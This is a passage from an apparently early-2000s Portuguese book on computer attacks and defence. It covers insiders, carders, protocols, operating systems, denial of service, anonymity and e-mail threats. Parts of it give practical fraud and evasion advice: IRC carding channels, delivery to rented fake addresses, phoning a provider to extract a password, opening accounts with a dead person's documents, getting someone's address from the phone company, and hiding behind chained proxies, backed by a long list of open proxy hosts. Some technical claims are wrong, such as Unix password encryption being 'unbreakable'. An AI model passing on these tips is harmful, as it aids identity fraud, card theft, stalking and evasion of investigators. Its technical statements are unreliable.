vingança contra a empresa ou seus chefes. Aí começa o
problema, pois o invasor esta dentro da própria empresa e possui
as senhas e o acesso aos dados.
Então basta entrar lá e os apagar, bagunçar os dados ou até
transferir algum dinheiro para a Suíça. Engana-se quem acha que
isso é um exagero, pois é o que mais acontece.
Muitas vezes estão comprometendo a rede, como em instalar
joguinhos ou programas de Chat que podem ter trojans e colocar a
Terrorismo Tecnológico 66
Aprenda Para Sobreviver

rede em riscos. Ou até para saber o telefone da “gostosa” do outro


setor.
Firewall é ineficaz contra eles, pois estão dentro da rede e com
certeza os administradores não estarão preocupados e nem
preparados para enfrentá-los.

1.7.6 - Terroristas

Este é um campo que os terroristas estão avançando em largos


passos, e é muito mais fácil causar grandes transtornos e até
desastres aéreos via a informática do que a via física, já que o
contato não é mais direto, mas sim via teclado.

1.7.7 Carders

È um pouco difícil para que um hacker consiga decodificar os


números dos cartões, mas isso não impede que se ele roube as
informações (banco de dados) no servidor da página da
prestadora dos cartões assim sendo ele conseguira as
informações dos clientes.
Os não tão experts em invasões simplesmente ganham essas
informações!
No IRC existem canais específicos dos carders como no
servidor /server irc.cris.com nos canais #carder, #card, #carding
Essas informações são trocadas, pois assim fica muita mais
difícil de se descobrir que esta usando o cartão, pois muita gente
de muitos lugares diferentes o utiliza e assim é difícil saber quem
realmente o roubou.

Assim o carder sai comprando, mas quando ele preenche os


dados em páginas de cadastro, seu endereço IP é rastreado pela
página e salvo em um bando de dados, para que este possa ser
localizado, porém se usar os recursos de Anonimidade assim não
será pego.
Geralmente usam os cartões para acessar páginas e registrar
softwares
Terrorismo Tecnológico 67
Aprenda Para Sobreviver

Geralmente são usados cartões de estrangeiros já que o limite


é maior.
E quando fazem compra os carders vão buscá-las na própria
firma ou mandam entregar em um endereço falso como uma casa
alugada só para isso.

No capítulo 5 este assunto é tratado de uma forma mais prática.

Daí vêem a importância do bom administrador para a


segurança da rede. E com certeza ele é sempre alvo e muitas
criticas.

1.8 Trapaceando para descobrir informações

É uma prática muito usada, quando você quer descobrir uma


senha, você liga para o provedor e diz que esqueceu sua senha,
provavelmente o suporte já cansado e sem muita vontade logo lhe
informará. Desta mesma forma pode ser após descobrir a
documentação de uma pessoa abrir contas virtuais, assinar
provedores e até pedir um telefone. Claro que pode dar confusão,
mas e se o dono da documentação for um defunto? Ou ele morar
lá no ceara e você no rio de janeiro? É obvio que o estelionatário
não trará muitos problemas.
Se quiser o endereço de uma pessoa é muito fácil vá até a
companhia telefônica e peça a segunda via da conta do fulano de
tal, bom na hora eles já te entregam sem pedir documentos e você
já terá o endereço da pessoa.
E isso também acontece em empresas aéreas.
Enfim usando a esperteza é muito fácil descobrir certas
informações.
Terrorismo Tecnológico 68
Aprenda Para Sobreviver

Vemos então como estamos vulneráveis a sermos descobertos,


até mesmo por ladrões, seqüestradores...
Pelo site das empresas de telefonia se colocarmos o nome da
pessoa e a cidade, ele nos traz então o endereço completo e o
telefone.
Cuidado então!
Terrorismo Tecnológico 69
Aprenda Para Sobreviver

_________________________Extra

Vamos entender mais sobre protocolos?

Protocolo é um conjunto de regras compartilhado sobre o


gerenciamento do fluxo de informações, que interagindo com as
camadas mais baixas da rede tem como finalidade garantir o
intercâmbio de informações ordenado e sem erros.
Por viajarem em pacotes, protocolos diferentes podem ser
empilhados em várias camadas na rede. Chamados isso de pilha de
protocolos.

Os protocolos mais usados em locais são:

IPX/SPX: Baseado num conjunto criado pela Xerox chamado


XNS. Padrão nas populares redes Novell Netware, o IPX/SPX, ou
simplesmente IPX, também são robustos e muito seguros, porém
menos complexos, e por isso indicados para redes locais.

NetBIOS: Criado pela IBM, é um protocolo simples e rápido.


Mesmo não tendo a complexibilidade e segurança de seus irmãos
maiores o NetBIOS pode ser usado sem problemas em pequenas e
médias redes locais.

NetBeui: Significa Network Basic End User Interface. Ele


suporta pequenas LAN’s é rápido e simples. Porém, tem uma
estrutura arquitetônica inerente que limita sua eficiência à medida
que a rede se expande. O protocolo netbios apenas deverá ser
instalado caso haja a necessidade de comunicação com redes
antigas (LAN manager).

Apple Talk: Desenvolvido pela Apple Computer para redes de


computadores padrão Macintosh. Por ser proprietário, seu uso
também é restrito somente a redes com este tipo de computador.
Terrorismo Tecnológico 70
Aprenda Para Sobreviver

TCP/IP: Com raízes no Departamento de Defesa Norte-


Americano, o TCP/IP é o protocolo usado na Internet e o mais
usado no mundo hoje. O TCP/IP foi projetado para interligar
computadores à distância, por isso é robusto, confiável e seguro.
Embora possa ser utilizado sem problemas em LANs, sua
complexibilidade sugere que seu uso seja voltado para as WANs.

SNA: Desenvolvido pela IBM para seus computadores de


grande e médio porte seu uso está restrito somente a esta área.

Veja a seguinte tabela!

Aplicativo netbios IPX/SPX TCP/IP


Integrar com X
NetWare
Conectar a Internet X
Trabalhar com UNIX X
Roteamento (WAN) X
Rede grande X
Rede pequena X X X
Terrorismo Tecnológico 71
Aprenda Para Sobreviver

Capítulo II

Sistemas Operacionais - Neste capítulo será tratado as


influencias que um determinado sistema operacional influi na hora
do ataque, e se existe um sistema operacional mais seguro do que
o outro.
Terrorismo Tecnológico 72
Aprenda Para Sobreviver

Sabemos que todos os computadores possuem sistemas


operacionais, e os computadores de bordo não são diferentes.
Para se comunicar com algum software seja banco de dados, e-
mail, protocolos ou qualquer outro dispositivo é necessário que
nesta máquina esteja instalado um S.O. (Sistema Operacional).
Sabia que muitos televisores, ar condicionado, secador de
roupa, microondas possui um sistema operacional, sendo este
geralmente o UNIX?

2.1 Windows X Unix

Tanto o Unix quanto o Windows trabalham com multi-tarefas.


As várias versões de cada S.O., como (Debiam Linux, Guarani,
Windows 98, Windows XP e muitos outros.).
O Windows possui uma larga vantagem sobre os outros
sistemas operacionais inclusive o Unix e seus derivados. Esta
vantagem é na parte de usuários e pequenos técnicos e a
facilidade e simplicidade de usar os recursos já que eles são em
formatos de “janelas” o que facilita a visualização e é muito fácil de
instalar programas, drivers, e inclusive o próprio sistema
operacional, que praticamente se instala sozinho usando a
tecnologia plug and play.
Muito importante também é que praticamente todos os
softwares encontrados no mercado são para plataforma Windows.

Na plataforma Unix têm:

- Distribuição gratuita (como é o caso do Linux), não requer


pagarmos fortunas com o sistema operacional e nem com suas
atualizações.
Terrorismo Tecnológico 73
Aprenda Para Sobreviver

- Criptografia inquebrável de senhas.


- Melhores ferramentas de rede como gerenciamento de portas.
- Melhor gerenciamento de permissões
- Código-fonte aberto

2.2 Vantagens do UNIX

A grande vantagem é que ele tem o código-fonte aberto (open-


source). Isso significa que junto com o SO e programas, vem o seu
código fonte e você pode alterá-lo, saber exatamente o que esta
sendo executado e como funciona.
Já que temos o código fonte pode-se então fazer a sua própria
versão do sistema operacional, fazendo com que ele execute e
haja exatamente como o programador queira.

Desvantagens Unix
Um problema do Unix é que ele é um tanto complicado para
usuários comuns o utilizarem sendo que muitas de suas funções
somente são acessadas via linha de comando.
O SO é gratuito, mas os aplicativos que são feitos por
encomendas estão cada vez mais ficando absurdamente caros.
Para instalar e configurar a plataforma também tem que se ter
um especialista. E para os usuários tem que de dar um curso para
trabalhar com o sistema.
Terrorismo Tecnológico 74
Aprenda Para Sobreviver

Desvantagens do Windows
O SO e muitos dos seus aplicativos como o Office custam uma
fortuna.
Quando você compra um software eles lançam um mais novo e
melhor.
Tanto o Windows como o Unix inesperadamente uma vez ou
outra travam sem motivo.

2.3 Configurações mal planejadas e erradas

Contas padrões do sistema, serviços desnecessários ativos


(portas), erros em permissões de arquivos e muitas senhas padrão
ou de senhas como data de nascimento, são ainda as maiores
falhas por causa de descuido. As contas padrões são perigosas,
pois qualquer pessoa que já tenha utilizado um sistema Server as
conhece. No do Unix contas como bin e admin já vêm com
senhas padrões de acesso ao sistema. Assim como no Windows
também têm algumas como convidados. Desabilite-as ou mude
as senhas. Quanto aos serviços e portas, se não estiver utilizando-
as desabilite-as.
Usar também uma proteção em que devidos IPs e usuários não
possam acessar determinados dados e softwares. Essas
permissões são muito importantes e devem ser utilizadas.
Somente com senha esses dados poderão ser acessados, usados,
copiados e apagados.
Terrorismo Tecnológico 75
Aprenda Para Sobreviver

2.4 Ataques restritos a um tipo de sistema

Para Windows existem milhões de vírus e trojans, já para o


Unix estes praticamente não existem.
Já o Unix tem falhas como no sendmail já no Windows o
sendmail funciona perfeitamente.

Ma hoje é muito fácil de se encontrar em páginas hacker (é só


procurar em www.google.com.br) programas específicos como
trojans para linux, trojans para Windows, vírus, scanners,
sniffers....

2.5 O que é DNS, SMTP, SNMP? (Entenda Mais)

2.5.1 O que é DNS?

O DNS (Domain Name System) é um esquema de


gerenciamento de nomes, hierárquico e distribuído. O DNS define
a sintaxe dos nomes usados na Internet, regras para delegação de
autoridade na definição de nomes, um banco de dados distribuído
que associa nomes a atributos (entre eles o endereço IP) e um
algoritmo distribuído para mapear nomes em endereços.
O DNS e especificado nas RFCs 882, 883 e 973. As aplicações
normalmente utilizam um endereço IP de 32 bits no sentido de
abrir uma conexão ou enviar um datagrama IP. Entretanto, os
usuários preferem identificar as máquinas através de nomes ao
invés de números. Assim é necessário um banco de dados que
permita a uma aplicação encontrar um endereço, dado que ela
Terrorismo Tecnológico 76
Aprenda Para Sobreviver

conhece o nome da máquina com a qual se deseja comunicar. Um


conjunto de servidores de nomes mantém o banco de dados com
os nomes e endereços das máquinas conectadas a Internet.
Na realidade este e apenas um tipo de informação armazenada no
domain system (sistema de domínios). Note que e usado um
conjunto de servidores interconectados, ao invés de um único
servidor centralizado. Há atualmente tantas instituições
conectadas a Internet que seria impraticável exigir que elas
notifiquem uma autoridade central toda vez que uma máquina é
instalada ou troque de lugar. Assim, a autoridade para atribuição
de nomes e delegada à instituições individuais.
Os servidores de nome formam uma arvore, correspondendo a
estrutura institucional. Os nomes também adotam uma estrutura
similar. Um exemplo típico é o nome segurança.xxx.br Para
encontrar seu endereço Internet, pode ser necessário o acesso a
ate quatro servidores de nomes. Inicialmente deve ser consultado
um servidor central, denominado servidor raiz, para descobrir onde
esta o servidor br. O servidor br é o responsável pela gerencia dos
nomes das instituições/empresas brasileiras ligadas a Internet.
O servidor raiz informa como resultado da consulta o endereço IP
de vários servidores de nome para o nível br (pode existir mais de
um servidor de nomes em cada nível, para garantir a continuidade
da operação quando um deles para de funcionar). Um servidor do
nível br pode então ser consultado, devolvendo o endereço IP do
servidor xxx. De posse do endereço de um servidor xxx e possível
solicitar que ele informe o endereço de um servidor jxh, quando,
finalmente, pode-se consultar o servidor jxh sobre o endereço da
máquina chupeta. O resultado final da busca é o endereço Internet
correspondente ao nome segurança.jxh.xxx.br Cada um dos níveis
percorridos e referenciado como sendo um domínio.
O nome completo segurança.jxh.xxx.br é um nome de domínio. Na
maioria dos casos, não é necessário ter acesso a todos os
domínios de um nome para encontrar o endereço correspondente,
pois os servidores de nome muitas vezes possuem informações
sobre mais de um nível de domínio o que elimina uma ou mais
consultas. Alem disso, as aplicações normalmente têm acesso ao
DNS através de um processo local (servidor para as aplicações e
Terrorismo Tecnológico 77
Aprenda Para Sobreviver

um cliente DNS), que pode ser implementado de modo a guardar


os últimos acessos feitos, e assim resolver a consulta em nível
local. Essa abordagem de acesso através de um processo local
simplifica e otimiza a tarefa das aplicações no que tange ao
mapeamento de nomes em endereços, uma vez que elimina a
necessidade de implementar, em todas as aplicações que fazem
uso do DNS, o algoritmo de caminhamento na arvore de domínios
descrito anteriormente. O DNS não se limita a manter e gerenciar
endereços da Internet.
Cada nome de domínio e um nó em um banco de dados, que pode
conter registros definindo várias propriedades. Por exemplo, o tipo
da máquina e a lista de serviços fornecidos por ela. O DNS
permite que seja definido um aliás (nome alternativo) para o no.
Também e possível utilizar o DNS para armazenar informações
sobre usuários, listas de distribuição ou outros objetos.
O DNS é particularmente importante para o sistema de correio
eletrônico. No DNS são definidos registros que identificam a
máquina que manipula as correspondências relativas a um dado
nome, identificado assim onde um determinado usuário recebe
suas correspondências. O DNS pode ser usado também para
definição de listas para distribuição de correspondências

2.5.2 O que é SMTP?

O SMTP (Simple Mail Transfer Protocol) é o protocolo usado no


sistema de correio eletrônico na arquitetura Internet TCP/IP. Um
usuário, ao desejar enviar uma mensagem, utiliza o módulo
interface com o usuário para compor a mensagem e solicita ao
sistema de correio eletrônico que a entregue ao destinatário.
Quando recebe a mensagem do usuário, o sistema de correio
eletrônico armazena uma copia da mensagem em seu spool (área
do dispositivo de armazenamento), junto com o horário do
armazenamento e a identificação do remetente e do destinatário. A
Terrorismo Tecnológico 78
Aprenda Para Sobreviver

transferência da mensagem é executada por um processo em


background, permitindo que o usuário remetente, após entregar a
mensagem ao sistema de correio eletrônico, possa executar outras
aplicações. O processo de transferência de mensagens,
executando em background, mapeia o nome da máquina de
destino em seu endereço IP, e tenta estabelecer uma conexão
TCP com o servidor de correio eletrônico da máquina de destino.
Note que o processo de transferência atua como cliente do
servidor do correio eletrônico. Se a conexão for estabelecida, o
cliente envia uma cópia da mensagem para o servidor, que a
armazena em seu spool. Caso a mensagem seja transferida com
sucesso, o servidor avisa ao cliente que recebeu e armazenou
uma copia da mensagem. Quando recebe a confirmação do
recebimento e armazenamento, o cliente retira a copia da
mensagem que mantinha em seu spool local. Se a mensagem, por
algum motivo, não for transmitida com sucesso, o cliente anota o
horário da tentativa e suspende sua execução. Periodicamente o
cliente acorda e verifica se existem mensagens a serem enviadas
na área de spool e tenta transmiti-las.
Se uma mensagem não for enviada por um período, por exemplo,
de dois dias, o serviço de correio eletrônico devolve a mensagem
ao remetente, informando que não conseguiu transmiti-la. Em
geral, quando um usuário se conecta ao sistema, o sistema de
correio eletrônico e ativado para verificar se existem mensagens
na caixa postal do usuário. Se existirem, o sistema de correio
eletrônico emite um aviso para o usuário que, quando achar
conveniente, ativa o módulo de interface com o usuário para
receber as correspondências. Uma mensagem SMTP divide-se em
duas partes: cabeçalho e corpo, separados por uma linha em
branco. No cabeçalho são especificadas as informações
necessárias para a transferência da mensagem. O cabeçalho e
composto por linhas, que contem uma palavra-chave seguida de
um valor. Por exemplo, identificação do remetente (palavra-chave
"to:" seguida do seu endereço), identificação do destinatário,
assunto da mensagem, etc... No corpo são transportadas às
informações da mensagem propriamente dita. O formato do texto e
livre e as mensagens são transferidos no formato texto. Os
Terrorismo Tecnológico 79
Aprenda Para Sobreviver

usuários do sistema de correio eletrônico são localizados através


de um par de identificadores. Um deles especifica o nome da
máquina de destino e o outro identifica caixa postal do usuário. Um
remetente pode enviar simultaneamente varias cópias de uma
mensagem, para diferentes destinatários utilizando o conceito de
lista de distribuição (um nome que identifica um grupo de
usuários). O formato dos endereços SMTP e o seguinte:
nome_local@nome_do_dominio onde o nome_do_dominio
identifica o domínio ao qual a máquina de destino pertence (esse
endereço deve identificar um grupo de máquinas gerenciado por
um servidor de correio eletrônico). O nome local identifica a caixa
postal do destinatário. O SMTP especifica como o sistema de
correio eletrônico transfere mensagens de uma máquina para
outra. O módulo interface com usuário e a forma como as
mensagens são armazenadas não são definidos pelo SMTP. O
sistema de correio eletrônico pode também ser utilizado por
processos de aplicação para transmitir mensagens contendo
textos.

2.5.3 O que é SNMP?

O sistema de gerenciamento de rede da arquitetura Internet


TCP/IP opera na camada de aplicação e baseia-se no protocolo
SNMP (Simple Network Management Protocol). Os padrões que
definem a estrutura de gerenciamento de redes Internet são
descritos nos documentos RFC-1155 (Structure Of Management
Information), RFC-1156 (Management Information Base) e RFC-
1157 (Simples Network Management Protocol). Como no esquema
de gerenciamento OSI, os processos que implementam as funções
de gerenciamento Internet atuam como agentes ou gerentes. Os
agentes coletam junto aos objetos gerenciadas as informações
recolhidas pelos clientes, com o objetivo de detectar a presença de
falhas no funcionamento dos componentes da rede (hosts,
Terrorismo Tecnológico 80
Aprenda Para Sobreviver

gateways, processos executando os protocolos de comunicação,


etc...), para que possam ser tomadas providencias no sentido de
contornar os problemas que ocorrem como conseqüência das
falhas. Um objeto gerenciado representa um recurso que pode ser
um sistema hospedeiro (estação de trabalho, servidor de
terminais, etc...), um gateway ou um equipamento de transmissão
(modem, pontes, concentradores, etc...). Cada objeto gerenciado e
visto como uma coleção de variáveis cujo valor pode ser lido ou
alterado. O gerente envia comandos aos agentes, solicitando uma
leitura no valor das variáveis dos objetos gerenciados (get e
response), ou modificando seu valor (put). A modificação do valor
de uma variável pode ser usada para disparar indiretamente a
execução de operações nos recursos associados aos objetos
gerenciados (por exemplo, umas reiniciarão). Na troca de
informações entre o gerente e o agente, são aplicados
mecanismos de autenticação para evitar que usuários não
autorizados interfiram no funcionamento da rede. A troca de
mensagens entre o gerente e o agente é definida pelo protocolo
SNMP. O SNMP define o formato e a ordem que deve ser seguida
no intercambio de informações de gerenciamento. As informações
sobre os objetos gerenciados são armazenados na MIB
(Management Information Base), que contem informações sobre o
funcionamento dos hosts, dos gateways, e dos processos que
executam os protocolos de comunicação (IP, TCP, ARP,...). A MIB
e especificada em ASN.1. O funcionamento do SNMP baseia-se
na troca de operações que permitem que o gerente solicite que o
agente lhe informe, ou modifique, o valor de uma variável de um
objeto na MIB. O SNMP define também uma operação (trap), que
permite que um agente informe ao gerente a ocorrência de um
evento especifico. Com o objetivo de permitir o uso do esquema
de gerenciamento OSI em redes que adotam a arquitetura Internet
TCP/IP, foi definido o protocolo de gerenciamento CMOT (CMIP
Over TCP/IP). O CMOT utiliza o serviço CMIS (Common
Management Information Service) e o protocolo CMIP (Common
Management Information Protocol) funcionando sobre uma
conexão TCP/IP. O CMTU e descrito na RFC-1095. Alexandre
Lopes -------------------- Mensagem editada por Tira Acentos 1.00 -
Terrorismo Tecnológico 81
Aprenda Para Sobreviver

Diabolik Dreamz Soft, 1995 MLº Alguém teria algum artigo em


português sobre o que é ºDNS em um servidor, ou ate mesmo
uma explicação de forma simples para ºque serve o DNS, sei
somente que ele faz troca de nome por número. É exatamente
isso. Você da um nome pra ele e ele fala o endereço IP (números)
correspondente aquele nome. Pra que serve isso? Pacotes IP têm
de ser endereçados por números, mas é extremamente incomodo
pra seres humanos decorar números. A solução foi usar um
serviço que fizesse a tradução de um para outro. Quando você faz
uma conexão com www.shareware.com o seu browser faz uma
conexão com um servidor DNS pedindo o endereço IP
correspondente à string "www.shareware.com". O DNS tenta
resolver isso localmente, mas se não conseguir propaga a
consulta pra outros servidores DNS ate conseguir (ou não) a
resposta, e então retorna o endereço pro browser que continua a
conexão. Os nomes no estilo aaa.bbbbbb.cc.dddd.e são
conseqüência da estrutura hierárquica usada na distribuição dos
nomes, e essa estrutura é usada pra melhorar a eficiência na
busca.

2.6 Ataques Universais

São ataques que trabalham no nível de protocolo (para saber


mais leia sobre modelo OSI da ISO), como o IP Spoof, com ele,
pode ser acessada qualquer máquina independente do sistema
operacional ali instalado. Não importa então o S.O. do invasor e do
invadido. Mesmo que for, por exemplo, Linux e Novell, Windows
VMS ou outro Unix.
O que acontece é que o protocolo TCP/IP é universal, isto é
esse protocolo roda em qualquer sistema operacional exatamente
para poder fazer a troca de informações.
Este protocolo faz uma conversão para que no outro sistema ao
converter estes dados consiga entendê-los.
Terrorismo Tecnológico 82
Aprenda Para Sobreviver

Agora como todos os SO conseguem trabalhar desta forma


“com esta conectividade” pode-se usar isto para atacá-los, não
importando qual plataforma esta rodando localmente.

Extra

Ataque por recusa de serviço

Este é o Denial of Service (DOS) ou Recusa de serviço.

Esse ataque consiste em enviar a máquina alvo com dezenas


ou centenas de pacotes de informação, fazendo com que esta não
consiga processar a todos os pacotes e consuma toda a sua
memória, com isso a máquina trava, pois não consegue executar
mais nenhuma tarefa. Porém esse ataque apenas causa danos
temporários, como fazer esse servidor parar por alguns momentos
e não fornecer os seus serviços.

Claro que isso faz o administrador ficar irritado, mas é só


reiniciar o sistema e tudo estará de volta ao normal.

Mas não rouba e nem vê nada ali instalado.


Este ataque pode ser usado para retirar um site do ar, um bom
exemplo é o ataque se foi planejado para retirar do ar o site
www.windowsupdate.com, mas a Microsoft antes de sofrer o
ataque absurdamente o retirou do ar, estranho pois parece que
ficaram com medo só ataque. Isto aconteceu dia 16-08-2003.com
o ataque do vírus worm Blaster
Terrorismo Tecnológico 83
Aprenda Para Sobreviver

Capítulo III

Anonimidade – Claro que um invasor não irá querer ser


descoberto e aí entra a parte de se camuflar, despistar, enfim fazer
ninguém descobrir quem invadiu o sistema.
Terrorismo Tecnológico 84
Aprenda Para Sobreviver

3.1 Anonimidade

O ato de ficar anônimo na Internet ou em qualquer lugar serve


exatamente para não ser descoberto, provavelmente por que o
que o anônimo está fazendo é algo proibido ou ele quer se passar
por outra pessoa.
As formas geralmente usadas são um Shell invadido, um Proxy
ou uma pessoa infectada por um trajam.
Com tudo isso pode invadir o sistema sem ser pego ou mandar
e-mails anonimamente.
Geralmente ele se conecta através de contas falsas, Cyber
Cafés, com números de documentos forjados ou roubados.

Ficar totalmente indetectável, e não ser pego por nenhum


agente é uma coisa muito fácil de ser feita. E não é preciso de
nenhum software mágico e sim de alguns conhecimentos. Tudo é
feito fazendo uma espécie de roteamento. Antes de invadir uma
máquina em São Paulo esse invasor se conecta a Finlândia e a
partir de lá ele se conecta em São Paulo.
Nem por um super segurança em informática ele será pego.

3.2 Proxy
(O Proxy é o que dá ao invasor o melhor resultado!)

O Proxy, é na verdade, uma ponte entre um servidor e um


cliente.
Quando se faz à conexão há um Proxy tudo o que você entra
pela Internet antes de fazer ou ser pedido ao site desejado é feito
ao Proxy, este, por sua vez, refaz o pedido ao site desejado. O site
responde ao Proxy e ele agora vê para quem é o conteúdo e envia
de volta ao invasor.
Terrorismo Tecnológico 85
Aprenda Para Sobreviver

Por isso não da para saber o endereço de quem está


invadindo, pois o Proxy refez todo o pedido com suas informações
(IP) e não com as informações do invasor.

Simplesmente é usado um Proxy1 anônimo que é facilmente


achado na Internet.

Para uma maior compreensão abaixo está à demonstração de


como todo o processo é feito.

Após ter o endereço deste “roteador”, entre no Painel de


Controles – Propriedades da Internet.

- Clique em conexão

- Em servidor de Proxy ative-o. Digamos que o endereço do


servidor que você conseguiu seja:

200.202.202.1:8080

Este é um endereço fictício não sei se ele funciona, e nem sei


se alguém o utiliza ou se ele existe.

- O Endereço então será: 200.202.202.1


- E a porá será: 8080

Depois é só clicar em OK e pronto já estará anônimo.

A imagem a seguir mostra como é feito no Windows XP. Para


fazer a configuração, o usuário já tem que estar conectado.

1
Uma lista de Proxy anônimo geralmente é pega pelo invasor em
http://www.multiproxy.org/txt_anon/proxy.txt
Terrorismo Tecnológico 86
Aprenda Para Sobreviver

3.3 Usando o anonymizer

Este é um serviço gratuito2 na Internet, visitando a sua


HomePage (www.anonymizer.com) ele possibilita que você digite
algum endereço e seja redirecionado por ele até a página
desejada.

E como é um servidor Proxy se o Administrador do site ou um


sistema invadido for consultar os logs de quem o visitou verá o log
do anonymizer e não o do invasor.

2
O serviço gratuito somente o deixa usar o http para usar ftp e outros devem ser pagos.
Terrorismo Tecnológico 87
Aprenda Para Sobreviver

3.4 Remailers

O Remailer serve para enviar e-mails anonimamente. Com ele


não é preciso se conectar a um servidor SMTP para fazer o envio,
o próprio remailer já é um servidor anônimo. Mas como precaução
pode ser usado o wingate, pois com ele é muito mais garantido.
Mas caso o invasor tiver enviado um monte de e-mails para
inundar uma caixa postal pode ter o seu IP real revelado.

Existem outras maneiras como por Shells, Outdials, IP Spoof,


Non-blind spoof e Blind spoof, não explicarei cada um, pois são
menos utilizados, pois é muito difícil configurá-los.

A questão é que não importa qual será o método que o invasor


vai usar para ficar anônimo, mas sim que se deve ter uma boa
defesa para ele não conseguir invadir, pois depois de feito será
muito difícil pegá-lo.

3.5 Lista de Proxy

164.58.28.250:80
194.muja.pitt.washdctt.dsl.att.net:80
web.khi.is:80
customer-148-223-48-114.uninet.net.mx:80
163.24.133.117:80
164.58.18.25:80
bpubl014.hgo.se:3128
bpubl007.hgo.se:3128
www.reprokopia.se:8000
193.188.95.146:8080
193.220.32.246:80
AStrasbourg-201-2-1-26.abo.wanadoo.fr:80
gennet.gennet.ee:80
Terrorismo Tecnológico 88
Aprenda Para Sobreviver

pandora.teimes.gr:8080
mail.theweb.co.uk:8000
mail.theweb.co.uk:8888
194.6.1.219:80
194.79.113.83:8080
ntbkp.naltec.co.il:8080
195.103.8.10:8080
pools1-31.adsl.nordnet.fr:80
pools1-98.adsl.nordnet.fr:80
195.167.64.193:80
server.sztmargitgimi.sulinet.hu:80
los.micros.com.pl:80
195.47.14.193:80
mail.voltex.co.za:8080
196.23.147.34:80
196.40.43.34:80
lvsweb.lasvegasstock.com:8000
musalemnt.notariamusalem.cl:80
ip-36-018.guate.net.gt:80
200.135.246.2:80
ntserver1.comnt.com.br:80
200-204-182-137.terra.com.br:80
200.21.225.82:8080
200.211.98.5:80
isdn02201.cultura.com.br:80
isdn02204.cultura.com.br:80
isdn03021.cultura.com.br:80
adao.dei.unicap.br:80
gateway.andromaco.cl:80
mail.care.org.gt:80
p75-90.cmet.net:8080
jaamsa.com:3128
host031210.ciudad.com.ar:80
host071052.arnet.net.ar:8000
200.46.109.82:80
200.52.4.82:80
correo.cfired.org.ar:80
200.61.6.50:8080
202.103.6.178:3128
202.104.189.20:8080
Terrorismo Tecnológico 89
Aprenda Para Sobreviver

202.104.20.181:80
202.105.138.19:8080
202.105.230.226:80
202.106.139.88:80
202.108.122.38:80
202.110.204.18:80
202.110.220.14:80
mail.jjs.or.id:80
cair.res.in:80
smtp2.info.com.ph:80
202.9.136.40:8080
202.99.225.45:8080
203.113.34.239:80
203.117.67.122:8080
203.123.240.112:80
proxy.nida.ac.th:8080
203.151.40.4:80
203.155.16.130:80
203.155.172.60:80
aworklan003105.netvigator.com:3128
esjv.com.hk:80
203.200.75.165:80
cp.chollian.net:80
yuluma.wa.edu.au:80
203.69.244.194:80
223-mail.internet.ve:8080
mail.bravocorp.com:8080
206.49.33.250:8080
207.61.38.67:8000
h209-17-147-1.gtconnect.net:80
209.47.38.116:8000
cr2098859123.cable.net.co:80
mail.unisol.com.ar:80
210.12.86.181:80
210.204.118.194:8080
210.21.93.141:3128
210.219.227.52:8080
210.242.164.150:80
210.8.92.2:80
210.82.40.243:8080
Terrorismo Tecnológico 90
Aprenda Para Sobreviver

210.92.128.194:8080
210.96.65.4:80
host211000070226.kagaku-k.co.jp:80
www.kan-shoku.co.jp:80
ns.toyoriko.co.jp:80
211.114.116.60:80
211.165.192.8:80
211.21.111.227:8080
211.233.21.166:8080
211.45.21.165:8080
dns1.daiken-c.co.jp:80
dns.lpgc.or.jp:80
211.93.108.113:8080
212.12.157.130:8000
enteleca-2.dsl.easynet.co.uk:80
TK212017066196.teleweb.at:80
212.251.36.62:80
adslb-98-18.cytanet.com.cy:80
212.38.132.122:80
212.60.65.206:8080
is2.isys.no:8000
213.121.248.138:80
213.16.133.130:80
213.176.28.6:80
acode-u.org:8080
213.25.170.98:8080
213.25.29.12:80
p038-30.netc.pt:80
xirus.com:8080
adsl-216-158-25-110.cust.oldcity.dca.net:80
normandintransit.com:80
216-238-112-40.dsl.ct.thebiz.net:80
216.72.196.21:80
216.72.63.198:80
216.72.63.198:8080
217-127-248-37.uc.nombres.ttd.es:3128
217.153.114.66:8080
host217-34-153-161.in-addr.btopenworld.com:8080
host217-34-194-49.in-addr.btopenworld.com:80
host217-37-205-177.in-addr.btopenworld.com:8080
Terrorismo Tecnológico 91
Aprenda Para Sobreviver

host182-44.pool21758.interbusiness.it:8000
host162-51.pool21759.interbusiness.it:80
217.66.203.82:3128
218.5.133.146:80
2.magicbird.co.jp:80
h0040f6a4e019.ne.client2.attbi.com:8080
4.22.156.10:80
61.11.26.150:80
61.131.48.219:80
61.133.63.129:80
61.138.130.229:8080
cm61-15-14-187.hkcable.com.hk:80
61.159.224.11:80
61.159.235.36:8080
61.180.73.66:8080
61.185.255.4:3128
61.32.11.130:8080
www.flab.fr:8080
adsl-63-192-134-107.dsl.snfc21.pacbell.net:8080
ftp.aparizona.com:80
64-132-153-94.gen.twtelecom.net:8000
ensait19.ensait.fr:80
ado.com.mx:80
AS7000_1B.sfn.co.jp:8080
ns.cyberlinks-jp.com:80
211.15.62.123:8000
210.163.167.162:80
h64-5-220-82.gtcust.grouptelecom.net:80
204.196.104.27:80
ftp.orange.uk.com:8000
maq241i.advance.com.ar:80
mertennt.merten.hu:80
61.142.169.98:80
ns.proserv.co.jp:80
www.nisshin-syouji.co.jp:80
202.9.136.40:80
210.254.8.52:8000
www.qdh.or.jp:80
207.167.236.137:80
210.74.254.35:80
Terrorismo Tecnológico 92
Aprenda Para Sobreviver

219.163.108.18:8080
mail.koibuchi.ac.jp:80
dns1.koibuchi.ac.jp:80

Para uma melhor consulta de proxys ativos consulte:

http://www.multiproxy.org/txt_anon/proxy.txt
Terrorismo Tecnológico 93
Aprenda Para Sobreviver

Capítulo IV

E-mails - Neste capítulo será discutido os problemas


enfrentados com os e-mails, sendo estes um grande causador de
problemas, e o serviço de troca de mensagens, cartas,
documentos e arquivos mais utilizados na Internet.
Terrorismo Tecnológico 94
Aprenda Para Sobreviver

4.1 Encarando problemas com E-Mail

Um grande problema que vem assustando programadores,


usuários e administradores são os vírus transmitidos por correntes
em arquivos anexos ou camuflados.

Esses podem agir em arquivos de sistemas, executáveis, dll,


banco de dados... Podem também vir com um trojan embutido.
Este por sua vez abrirá uma porta na máquina infectada, e esta
ficará aberta para possíveis ataques.

Estes ataques podem ser roubo de informações, fazer um


desvio de trafego (assim tudo que chegar e for enviado desta
máquina passará por outra e esta por sua vez será uma máquina
espiã) ou serem vírus destrutivos, apagando desconfigurando ou
embaralhando informações úteis do sistema ou informações do
usuário (banco de dados, arquivos etc).

A forma de se combater é ter uma máquina com um ótimo


antivírus que analise a cada e-mail que chegue. Porém, nem
sempre o antivírus terá no seu banco de dados o vírus, então uma
boa política de segurança é imprescindível.

4.2 Spam

Spam na verdade são mensagens mandadas em série, isto é


